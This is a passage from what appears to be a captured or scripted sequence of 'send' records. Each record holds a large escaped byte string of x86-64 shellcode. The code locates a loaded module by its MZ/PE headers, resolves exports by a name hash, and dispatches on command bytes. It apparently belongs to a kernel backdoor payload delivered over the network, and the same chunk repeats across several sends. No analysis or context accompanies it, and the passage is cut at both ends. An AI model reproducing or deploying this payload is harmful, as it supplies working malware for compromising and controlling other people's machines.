\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 7, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 8, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 9, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 